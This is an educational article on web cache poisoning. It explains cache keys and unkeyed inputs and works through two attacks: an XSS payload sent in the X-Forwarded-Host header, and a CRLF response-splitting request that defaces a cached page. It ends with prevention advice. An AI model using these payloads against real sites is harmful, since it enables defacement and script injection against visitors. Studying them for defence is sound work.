What is web cache poisoning?

Web cache poisoning involves sending a specially crafted request that generates a malicious response that is saved in the web cache and sent to other legitimate users.

The impact of the manipulated response depends on whether the poisoned cache is shared by multiple users or used by a single user.

If the response is stored in a shared web cache, such as one on a proxy server, every user who shares that cache receives the malicious response on each subsequent request until the cache entry is removed. If it is stored only in a local browser cache, only the user of that browser instance is affected.

How does a web cache work?

To understand how web cache poisoning vulnerabilities arise, it is important to have a basic understanding of how web caches work.

Web caching is the technique of storing a copy of a web page supplied by a web server in a cache, a store that is very fast to read but limited in capacity.



The first time a user visits a web page, the response is stored in the cache. The next time the same page is requested, the cache delivers the stored copy, which makes the content faster to access and keeps the origin server from becoming overloaded.

The cache sits between the server and the user, where it stores the responses to specific requests for a fixed amount of time.

If any other user sends the same request, the cache responds with a copy of the cached response to the user, without communicating with the web-server. This reduces the load on the web-server by reducing the number of repeated requests it has to handle.

Web-caches can be used in multiple ways, such as:

Forward caching: the cache is placed outside the web-server’s network (for example, on the client’s computer) and stores only heavily accessed items.

Backward caching (more commonly called reverse caching): the cache is placed inside the web-server’s network to balance the load of incoming requests.

When the cache receives an HTTP request, it has to figure out whether there is a cached response that can respond directly, or whether it has to forward the request for handling by the back-end server.
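The hit-or-forward decision described above can be sketched in a few lines. This is only a toy model, not how any particular cache product is implemented: the `SimpleCache` class, its `origin` callback (standing in for the back-end server), and the fixed `ttl_seconds` are all hypothetical names chosen for illustration.

```python
import time
from typing import Callable, Dict, Tuple


class SimpleCache:
    """Toy shared cache: stores one response per request key for a fixed TTL."""

    def __init__(self, origin: Callable[[str], str], ttl_seconds: float = 60.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.origin = origin            # stands in for the back-end server
        self.ttl_seconds = ttl_seconds  # how long an entry stays fresh
        self.clock = clock              # injectable so expiry can be tested
        self.store: Dict[str, Tuple[float, str]] = {}
        self.origin_hits = 0            # number of requests forwarded to origin

    def get(self, request_key: str) -> str:
        now = self.clock()
        entry = self.store.get(request_key)
        if entry is not None and entry[0] > now:
            return entry[1]             # cache hit: origin is not contacted
        self.origin_hits += 1           # cache miss or expired entry
        response = self.origin(request_key)
        self.store[request_key] = (now + self.ttl_seconds, response)
        return response
```

Two identical requests inside the TTL reach the origin only once; every later requester gets whatever was stored first, which is exactly the property that poisoning abuses.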

How is web cache poisoning carried out?

1. Using unkeyed inputs

The cache key is the unique identifier of a web page in the cache.

Caches identify equivalent requests by comparing their cache keys. Usually, the cache key consists of the request line and the Host header. Components of the request that are not included in the cache key are said to be “unkeyed”.

Unkeyed components can include the port (the cache parses the Host header and excludes the port from the cache key), the query string (the request line is typically keyed, but some caches exclude the entire query string), individual query parameters (arbitrary parameters), etc.

If the cache key of an incoming request matches the cache key in the cache, then the cache considers both requests to be identical. As a result, it will respond with a copy of the cached response that was generated for the original request until the cached response expires.
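To make the matching concrete, here is a minimal sketch of a cache key built from the request line and the Host header only. The `cache_key` function and the `www.example.com` host are hypothetical, and real caches differ in exactly which components they key on.

```python
from typing import Dict, Tuple


def cache_key(method: str, path: str, headers: Dict[str, str]) -> Tuple[str, str, str]:
    """Build a key from the request line and Host header only (assumed rule)."""
    normalized = {name.lower(): value for name, value in headers.items()}
    return (method.upper(), path, normalized.get("host", "").lower())


# A clean request and a crafted one that differ only in an unkeyed header.
clean = cache_key("GET", "/en", {"Host": "www.example.com"})
crafted = cache_key("GET", "/en", {"Host": "www.example.com",
                                   "X-Forwarded-Host": "canary"})

# Both requests map to the same cache entry because X-Forwarded-Host is unkeyed.
same_entry = clean == crafted
```

Because the two keys are equal, a response generated for the crafted request would be served to anyone who later sends the clean one.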

Original request:

GET http://testcache.com HTTP/1.1

Host: www.redhat.com

X-Forwarded-Host: canary

Original response:

HTTP/1.1 200 OK

Cache-Control: public, no-cache

<meta property="og:image" content="https://canary/cms/social.webp" />

The application uses the X-Forwarded-Host header to generate a URL in the meta tag. We can exploit this with a simple cross-site scripting payload:

GET http://testcache.com HTTP/1.1

Host: www.redhat.com

X-Forwarded-Host: a."><script>alert(1)</script>

HTTP/1.1 200 OK

Cache-Control: public, no-cache

<meta property="og:image" content="https://a."><script>alert(1)</script>"/>

This response executes arbitrary JavaScript in the browser of whoever views it. To confirm that the cache has been poisoned, resend the request without the malicious header, from a different system:

GET /en?dontpoisoneveryone=1 HTTP/1.1

Host: www.redhat.com

HTTP/1.1 200 OK

<meta property="og:image" content="https://a."><script>alert(1)</script>"/>

2. Using HTTP response splitting

Original request:

GET http://testsite.com/redir.php?site=https://other.testsite.com HTTP/1.1

Host: testsite.com

User-Agent: Mozilla/4.7 [en] (WinNT; I)

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding: gzip

Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

Original response:

HTTP/1.1 302 Moved Temporarily

Date: Tue, 30 Nov 2021 02:41:20 GMT

Server: Apache-Coyote/1.1

Host: testsite.com

Content-Length: 0

Any request for a resource on the web server is answered with the cached version of that resource. The cache can be poisoned by crafting a request that injects a “Last-Modified” header with a date in the future into the response.

- We force the cache server to generate multiple responses to one request

GET http://testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Thu,%2027%20Oct%202022%2022:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>deface!</html> HTTP/1.1

Host: testsite.com

User-Agent: Mozilla/4.7 [en] (WinNT; I)

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding: gzip

Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

We intentionally set a future date (27 October 2022) in the “Last-Modified” header of the second response so that the cache stores it. The request translates to the following responses:

HTTP/1.1 302 Moved Temporarily

Date: Tue, 30 Nov 2021 02:44:33 GMT

Server: Apache-Coyote/1.1

Content-Length: 0

HTTP/1.1 200 OK

Last-Modified: Thu, 27 Oct 2022 22:50:18 GMT

Content-Type: text/html

Content-Length: 20

<html>deface!</html>

- We send a request for the web page that we want to replace in the cache of the server

GET http://testsite.com/index.html HTTP/1.1

Host: testsite.com

User-Agent: Mozilla/4.7 [en] (WinNT; I)

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding: gzip

Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

The web cache sees that the “Last-Modified” header is present in the previous response and that its date is more recent than the existing cache entry, so the cached copy of the requested resource (“index.html”) is replaced with the malicious response (“<html>deface!</html>”).
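The splitting step can be reproduced offline with a small sketch. It assumes, hypothetically, that the redirect script URL-decodes the `site` parameter and copies it unchanged into a `Location` header; `build_redirect` and `is_safe_header_value` are illustrative names, not part of any real framework, and the payload is a shortened form of the one used above.

```python
from urllib.parse import unquote


def build_redirect(site_param: str) -> bytes:
    """Naive redirect handler: copies the decoded parameter into Location."""
    location = unquote(site_param)  # %0d%0a becomes a real CRLF here
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            f"Location: {location}\r\n"
            "Content-Length: 0\r\n\r\n").encode("latin-1")


def is_safe_header_value(value: str) -> bool:
    """Reject values containing CR or LF, which would end the header early."""
    return "\r" not in value and "\n" not in value


payload = ("%0d%0aContent-Length:%200%0d%0a%0d%0a"
           "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
           "Content-Length:%2020%0d%0a%0d%0a<html>deface!</html>")

raw = build_redirect(payload)
# Count how many status lines a downstream cache would see in the byte stream.
status_lines = raw.count(b"HTTP/1.1 ")
```

With this payload the single reply contains two status lines, so a cache reading the stream can treat the injected part as a second, separate response. Checking the decoded value with `is_safe_header_value` before writing it into a header is one simple way to block the split.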

How to prevent web cache poisoning?

Defending against cache poisoning attacks can be tricky, and disabling caching entirely is rarely a workable solution. Instead, opt for preventive measures such as the following:

Cache only static resources, such as *.js, *.css, and *.webp files, that are always identical.

Make sure the application is not vulnerable to XSS, even where the vulnerability does not seem to affect the client browser directly, because a poisoned cache can deliver the payload to other users.

Understand and restrict where caching happens. Handle caching at a single point (for example, Cloudflare), and be aware of frameworks that implement their own caching.

Avoid using user inputs as the cache key.
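As a rough illustration of the first measure above, caching only static resources, a cache layer could decide cacheability from the file extension alone. The `is_cacheable` helper and the `STATIC_EXTENSIONS` tuple are hypothetical; in practice this rule would normally live in the cache or CDN configuration rather than in application code.

```python
from urllib.parse import urlsplit

# Extensions taken from the list of static resources above.
STATIC_EXTENSIONS = (".js", ".css", ".webp")


def is_cacheable(url: str) -> bool:
    """Allow caching only when the URL path ends in a known static extension."""
    path = urlsplit(url).path.lower()  # ignore the query string and fragment
    return path.endswith(STATIC_EXTENSIONS)
```

Checking the parsed path rather than the whole URL means a request such as `/redir.php?site=a.css` is not treated as a static file.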